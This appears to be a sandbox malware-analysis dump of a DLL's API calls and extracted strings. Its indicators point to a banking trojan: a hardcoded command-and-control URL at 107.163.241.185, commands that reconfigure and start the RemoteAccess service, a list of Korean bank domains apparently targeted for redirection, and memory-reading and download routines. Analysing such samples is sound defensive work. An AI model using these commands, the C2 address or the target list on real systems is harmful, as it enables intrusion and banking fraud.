                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ExceptionThrow$CloseOpenQueryValuelstrlen
                                      • String ID: DLLPath$U1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XFNlcnZpY2VzXFJlbW90ZUFjY2Vzc1xSb3V0ZXJNYW5hZ2Vyc1xJcA==$mp3$net start RemoteAccess$sc config RemoteAccess start= auto$sc stop RemoteAccess
                                      • API String ID: 1704467221-2251003411
                                      APIs
                                        • Part of subcall function 10007E20: strstr.MSVCRT ref: 10007ECB
                                        • Part of subcall function 10007E20: strstr.MSVCRT ref: 10007EEF
                                        • Part of subcall function 10007E20: strcspn.MSVCRT ref: 10007EFE
                                        • Part of subcall function 10007E20: strstr.MSVCRT ref: 10007F0A
                                        • Part of subcall function 10007E20: strcspn.MSVCRT ref: 10007F19
                                        • Part of subcall function 10007E20: strncpy.MSVCRT ref: 10007F22
                                        • Part of subcall function 10007E20: strstr.MSVCRT ref: 10007F5F
                                        • Part of subcall function 10007E20: strcspn.MSVCRT ref: 10007F72
                                        • Part of subcall function 100073C0: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 100073D7
                                        • Part of subcall function 100073C0: WSAIoctl.WS2_32 ref: 1000740F
                                        • Part of subcall function 10007750: RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,?,?,?,100199D8), ref: 1000777F
                                        • Part of subcall function 10007750: GlobalMemoryStatusEx.KERNEL32(?), ref: 10007839
                                        • Part of subcall function 10007750: GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,100199D8), ref: 10007892
                                      • send.WS2_32(00000000,?,00000128,00000000), ref: 1000923A
                                      • closesocket.WS2_32(00000000), ref: 10009246
                                      • select.WS2_32 ref: 1000929C
                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 100092B8
                                      • recv.WS2_32(00000000,?,000000BC,00000000), ref: 100092DA
                                      • closesocket.WS2_32(00000000), ref: 1000938E
                                      • InterlockedExchange.KERNEL32(1001ADF8,00000001), ref: 1000939F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: strstr$strcspn$closesocket$DefaultExchangeGlobalInterlockedIoctlLanguageMemoryOpenStatusSystemrecvselectsendsetsockoptstrncpy
                                      • String ID: SeShutdownPrivilege$zip
                                      • API String ID: 742242273-4289258210
                                      APIs
                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,?,?,10008B65,?), ref: 100087AF
                                      • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,10008B65,?), ref: 100087CA
                                      • ChangeServiceConfigA.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,10008B65), ref: 100087EF
                                      • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,?,?,?,10008B65,?), ref: 100087FA
                                      • GetLastError.KERNEL32(?,?,?,?,10008B65,?), ref: 10008804
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10008B65,?), ref: 10008818
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10008B65,?), ref: 1000881B
                                      • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,10008B65,?), ref: 10008836
                                      • Sleep.KERNEL32(00000064), ref: 1000884B
                                      • QueryServiceStatus.ADVAPI32(00000000,?), ref: 10008853
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10008B65,?), ref: 1000885A
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10008B65,?), ref: 10008862
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Service$CloseHandle$OpenQueryStatus$ChangeConfigErrorLastManagerSleepStart
                                      • String ID:
                                      • API String ID: 1627767825-0
                                      APIs
                                      • LoadLibraryA.KERNEL32(urlmon.dll,00000001,00000001,100199D8), ref: 10007A97
                                      • LoadLibraryA.KERNEL32(wininet.dll), ref: 10007AA0
                                      • GetProcAddress.KERNEL32(00000000,URLDownloadToCacheFileA), ref: 10007AC9
                                      • GetProcAddress.KERNEL32(00000000,GetUrlCacheEntryInfoA), ref: 10007AD4
                                      • 6D262DD0.MFC42(00000050), ref: 10007AD8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc$D262
                                      • String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$urlmon.dll$wininet.dll
                                      • API String ID: 1173762060-1569318151
                                      • Opcode ID: 709742a31d0fadea7edc8af64177e44467c470bc28e1ea771c10d62153978372
                                      • Instruction ID: 0ba0445337995a34d0d020c410f7d090e2bbd8e81f04aadd91c8ed6f97ba3bbd
                                      • Opcode Fuzzy Hash: 709742a31d0fadea7edc8af64177e44467c470bc28e1ea771c10d62153978372
                                      • Instruction Fuzzy Hash: B441FE32A0091C6BDB15CAB88C55BEF7A66FB88310F540369F716AB2C1DEF15E45CB44
                                      APIs
                                      • SafeArrayGetVartype.OLEAUT32(?,?), ref: 1000B037
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 1000B04F
                                      • 6D262DD0.MFC42(0000000C), ref: 1000B07D
                                      • SysAllocString.OLEAUT32(?), ref: 1000B09F
                                      • 6D262DD0.MFC42(0000000C), ref: 1000B0DA
                                      • InterlockedDecrement.KERNEL32(?), ref: 1000B114
                                      • InterlockedDecrement.KERNEL32(?), ref: 1000B148
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 1000B17C
                                      • InterlockedIncrement.KERNEL32(?), ref: 1000B195
                                      • InterlockedDecrement.KERNEL32(?), ref: 1000B1A7
                                      • SysFreeString.OLEAUT32(00000000), ref: 1000B1BC
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Interlocked$ArrayDecrementSafe$D262DataString$AccessAllocFreeIncrementUnaccessVartype
                                      • String ID:
                                      • API String ID: 3796710767-0
                                      • Opcode ID: 05ab98cb6835f449d3afe92a0ec598aecaf92792fb8f31b2b9e620e5b1815253
                                      • Instruction ID: 2f4c7833868a6a642660d5ddbd74aa3eac225ba51bae9dcfe10431cb2488e8f4
                                      • Opcode Fuzzy Hash: 05ab98cb6835f449d3afe92a0ec598aecaf92792fb8f31b2b9e620e5b1815253
                                      • Instruction Fuzzy Hash: A751CFB29047929BE710DF6588C5A5FF7E4FB84680F814A2CF885D3215E734ED85CB92
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 1000AC98
                                      • 6D262DD0.MFC42 ref: 1000ACA1
                                      • 6D262DD0.MFC42(0000000C), ref: 1000AD4A
                                      • VariantClear.OLEAUT32(?), ref: 1000AE0B
                                      • VariantClear.OLEAUT32(?), ref: 1000AE17
                                      • InterlockedIncrement.KERNEL32(-00000008), ref: 1000AE36
                                      • InterlockedDecrement.KERNEL32(?), ref: 1000AE4A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Variant$ClearD262Interlocked$DecrementIncrementInit
                                      • String ID:
                                      • API String ID: 4080713044-0
                                      • Opcode ID: 30582efdfb73e3a1e08f54b0a8ea1c393c0aa53144726bcbb2eaf70a4ecd28c6
                                      • Instruction ID: 79ffa18ca43941fce37d839cf4afa098f59e3dcefab3dc036024d3061b98d5c3
                                      • Opcode Fuzzy Hash: 30582efdfb73e3a1e08f54b0a8ea1c393c0aa53144726bcbb2eaf70a4ecd28c6
                                      • Instruction Fuzzy Hash: C0619271A083829BE714CF24C845B1FB7E4EF9A794F014B1DF98197245DBB5E884CBA2
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: D262strstr
                                      • String ID: %s/joy.asp?sid=%s$%s|NULL|%s|%s$11121541$ECF4BB45F69E$http://$http://107.163.241.185:16300/
                                      • API String ID: 3951026917-2965986427
                                      • Opcode ID: 6a389dea83708a48e9eaed4108e65dda5b376556a2b6c1b95fe17ab307e458e2
                                      • Instruction ID: b13f840aca1df8f0e8e04d5b101a117d0290481ec4a8539e160a7b991a9b7fb1
                                      • Opcode Fuzzy Hash: 6a389dea83708a48e9eaed4108e65dda5b376556a2b6c1b95fe17ab307e458e2
                                      • Instruction Fuzzy Hash: A931B475604740ABE724CB74CC01BEB76D5EBC8340F44892CB64A8B285DF78D544C752
                                      APIs
                                        • Part of subcall function 10005620: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 1000562A
                                        • Part of subcall function 10005620: OpenProcessToken.ADVAPI32(00000000), ref: 10005631
                                        • Part of subcall function 10005620: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10005647
                                        • Part of subcall function 10005620: AdjustTokenPrivileges.KERNELBASE ref: 1000568A
                                        • Part of subcall function 10005620: CloseHandle.KERNEL32 ref: 10005695
                                      • CreateMutexA.KERNEL32(00000000,00000001,Global\98012trt8-d8dfsf,?,10008C0C), ref: 10008BAB
                                      • GetLastError.KERNEL32(?,10008C0C), ref: 10008BB3
                                      • ReleaseMutex.KERNEL32(00000000,?,?,?,10008C0C), ref: 10008BDD
                                      • CloseHandle.KERNEL32(00000000,?,?,?,10008C0C), ref: 10008BE4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: CloseHandleMutexProcessToken$AdjustCreateCurrentErrorLastLookupOpenPrivilegePrivilegesReleaseValue
                                      • String ID: ERROR_ALREADY_EXISTS$Global\98012trt8-d8dfsf$SeDebugPrivilege$c:\11.txt
                                      • API String ID: 3631164735-4205529783
                                      • Opcode ID: f7fd6434f81f715ccf36bb5118b931db28033082902ce0681c6efb333c9d0bf3
                                      • Instruction ID: 5584062bcfe8fe443fc193796f50a74a123afcaee35dc86c6677604280257fb5
                                      • Opcode Fuzzy Hash: f7fd6434f81f715ccf36bb5118b931db28033082902ce0681c6efb333c9d0bf3
                                      • Instruction Fuzzy Hash: 19E09276910020B3FA20E3606C8DEDF3D62E7967AAF550020F70AA6191DB36C9D182A2
                                      APIs
                                      • 6D262DD0.MFC42(0000000C,Win32_NetworkAdapterConfiguration,00000000,00000000,00000000,?,?,ROOT\CIMV2), ref: 1000A864
                                      • SysStringLen.OLEAUT32(?), ref: 1000A89E
                                      • SysStringLen.OLEAUT32(?), ref: 1000A8BB
                                      • SysAllocStringByteLen.OLEAUT32(00000000), ref: 1000A8CF
                                      • InterlockedDecrement.KERNEL32(00000008), ref: 1000A95B
                                      • SysFreeString.OLEAUT32(00000000), ref: 1000A970
                                      Strings
                                      • Win32_NetworkAdapterConfiguration, xrefs: 1000A85B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$AllocByteD262DecrementFreeInterlocked
                                      • String ID: Win32_NetworkAdapterConfiguration
                                      • API String ID: 959857571-4052814535
                                      • Opcode ID: 696aefe1056031e8381074ea8d5f724c3fb411b7b74b26e6d566fbb943f84d1b
                                      • Instruction ID: 7af6534ef6524c84e344720a7089e89789d2c6adbb66ef60a0126f8e7add14fe
                                      • Opcode Fuzzy Hash: 696aefe1056031e8381074ea8d5f724c3fb411b7b74b26e6d566fbb943f84d1b
                                      • Instruction Fuzzy Hash: EB41D471B006159FE710DF18C88095EF7E5FB86684F258B29F885DB208E775ED86CB81
                                      APIs
                                      • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000FE77,?), ref: 1000F7DE
                                      • GetFileSize.KERNEL32(?,00000000,?,00000000,?), ref: 1000F84B
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,1000FE77), ref: 1000F86B
                                      • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 1000F882
                                      • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,1000FE77), ref: 1000F88B
                                      • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 1000F89C
                                      • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 1000F8BC
                                      • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 1000F8CD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$PointerRead$HandleInformationSize
                                      • String ID:
                                      • API String ID: 2979504256-0
                                      • Opcode ID: d88dd7143e5a55282583a39c7f48a16c409f497c41c0cca4329b838faa6cc43a
                                      • Instruction ID: 405fe81f1d8ab72a7605b9501efea937567496558c0defe8bd6331aae6a0450c
                                      • Opcode Fuzzy Hash: d88dd7143e5a55282583a39c7f48a16c409f497c41c0cca4329b838faa6cc43a
                                      • Instruction Fuzzy Hash: 9D51C1B1A04312AFF314CE54CC81FBBB7E8EF84784F10891CF68597694EA70E9059B56
                                      APIs
                                      • RegCreateKeyExA.ADVAPI32(00000002,?,00000000,00000000,00000000,000F003F,00000000,?,?,?,00000000,00000000,80000002,00000000,DLLPath,00000002), ref: 10008527
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,0002001F,?), ref: 10008547
                                      • RegSetValueExA.ADVAPI32(?,?,00000000,?,?,?), ref: 1000857D
                                      • RegSetValueExA.ADVAPI32(?,?,00000000,?,?), ref: 100085AA
                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?,?,?,?,?,?,?,?,?,?,10008E45,?), ref: 100085C8
                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 100085DA
                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?,?,?,?,?,?,?,?,?,?,10008E45,?), ref: 100085F8
                                      • RegDeleteValueA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,10008E45,?), ref: 1000860A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: OpenValue$Delete$Create
                                      • String ID:
                                      • API String ID: 2295199933-0
                                      • Opcode ID: 456ad6509b8fb058ab17bc1d6503d03c4a478f654bf904014c631ecf16233c95
                                      • Instruction ID: b68374bf711ffe28daf24b35b567a8d817eee2586d1f4d5131a9a979ce9dc9dd
                                      • Opcode Fuzzy Hash: 456ad6509b8fb058ab17bc1d6503d03c4a478f654bf904014c631ecf16233c95
                                      • Instruction Fuzzy Hash: 0E413AB1600249ABEB10CFA5CD88EAF77BDFB4C690B158618FA55D3256D635EE008B70
                                      APIs
                                      • CreateFileA.KERNEL32(72656472,40000000,00000000,00000000,00000002,00000080,00000000,flushdns,77068400,10007027,file error,/flushdns), ref: 10005809
                                      • WriteFile.KERNEL32(00000000,72657672,10019B1F,SearchOrder,00000000), ref: 1000582B
                                      • CloseHandle.KERNEL32(00000000), ref: 10005832
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleWrite
                                      • String ID: SearchOrder$flushdns
                                      • API String ID: 1065093856-3551094870
                                      • Opcode ID: 95aecc5bbb7728e2d3004c277a4a6589035de193547edee27a9b936397a63fcc
                                      • Instruction ID: ef37b5df3fd9416dab6416b978454a5d0d7b8f3b63e71bbe0519d8d63ca187da
                                      • Opcode Fuzzy Hash: 95aecc5bbb7728e2d3004c277a4a6589035de193547edee27a9b936397a63fcc
                                      • Instruction Fuzzy Hash: 69E06D712402207BF22487249C4EFAB3A58EBC8721F108608F31A961D1CBB0AC058668
                                      APIs
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000001,00000000,10010D09), ref: 1000F9F5
                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,00000001,00000000,10010D09), ref: 1000FA36
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$CreatePointer
                                      • String ID:
                                      • API String ID: 2024441833-0
                                      • Opcode ID: 6675c2e020021266492d22b367d027f32c71b801bb070b6a2fb72d1fa451fff9
                                      • Instruction ID: 82c05d4eb222960227533bad6493fa4047be9ed8a2b8e5bde8ae66ca70aabe6a
                                      • Opcode Fuzzy Hash: 6675c2e020021266492d22b367d027f32c71b801bb070b6a2fb72d1fa451fff9
                                      • Instruction Fuzzy Hash: 7D41A0B26013418FE320CF6998C4B5BB7D8F7953A9F208A3FF199C6940C370D8999B21
                                      APIs
                                      Strings
                                      • , xrefs: 10006AC4
                                      • file error, xrefs: 10006A68
                                      • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c, xrefs: 10006A41
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: strchr
                                      • String ID: $file error$www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c
                                      • API String ID: 2830005266-2540400106
                                      • Opcode ID: 23491e53ffd28ee1f1fb228301a5196be38e344967e44dbb00a2e60f8e0de54f
                                      • Instruction ID: cf09df00d589f54944db86fe8f12c4b48108bc34a5b538311976df3d68cdb4a6
                                      • Opcode Fuzzy Hash: 23491e53ffd28ee1f1fb228301a5196be38e344967e44dbb00a2e60f8e0de54f
                                      • Instruction Fuzzy Hash: E031D4366049081BD72CC878981566B76C3FBC5270FA5473DBA6B876C0DEF59E48C241
                                      APIs
                                      • 6D262DD0.MFC42(00000001), ref: 10006E46
                                      • VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 10006E6D
                                      • 6D262DD0.MFC42(00001000,00000000), ref: 10006EAA
                                      • ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 10006EC7
                                      • CloseHandle.KERNEL32(00000000), ref: 10006F21
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: D262$CloseHandleMemoryProcessQueryReadVirtual
                                      • String ID:
                                      • API String ID: 4133444876-0
                                      • Opcode ID: b4b864220a103b4f9d22497cecf06cd65cc241568f318f34bc9304c6b1666796
                                      • Instruction ID: 2f216d3c92ef82be60180469efd54965c0b310b1021fef6d999fa98d0b99ce03
                                      • Opcode Fuzzy Hash: b4b864220a103b4f9d22497cecf06cd65cc241568f318f34bc9304c6b1666796
                                      • Instruction Fuzzy Hash: A631AD717043429BE710CF18CC81A6BB3EAEBC9784F10452CFE8897245DB75EC468BA2
                                      APIs
                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,10005B8D), ref: 1000599B
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 100059B8
                                      • 6D262DD0.MFC42(00000000), ref: 100059BF
                                      • ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 100059FD
                                      • CloseHandle.KERNEL32(00000000), ref: 10005A37
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateD262HandleReadSize
                                      • String ID:
                                      • API String ID: 2959762680-0
                                      • Opcode ID: f27e6052ed72f7358379c96a1137fe1580c797e8f6c6e2a160a5064b2e3a8428
                                      • Instruction ID: d343087bb03fad32f03e5ae059147a2c5f7908d67b4ab7f6cbcfc06277a3a212
                                      • Opcode Fuzzy Hash: f27e6052ed72f7358379c96a1137fe1580c797e8f6c6e2a160a5064b2e3a8428
                                      • Instruction Fuzzy Hash: 4E21F571304345AFE720CB28DC85BEBB3D9FB88710F404928FB86D7280D6B5B944CA66
                                      APIs
                                      • wcslen.MSVCRT ref: 100113A8
                                      • 6D262DD0.MFC42(00000002,72657672,1001A365,654E5F32,00000000,00000000,10006735,00000000), ref: 100113B2
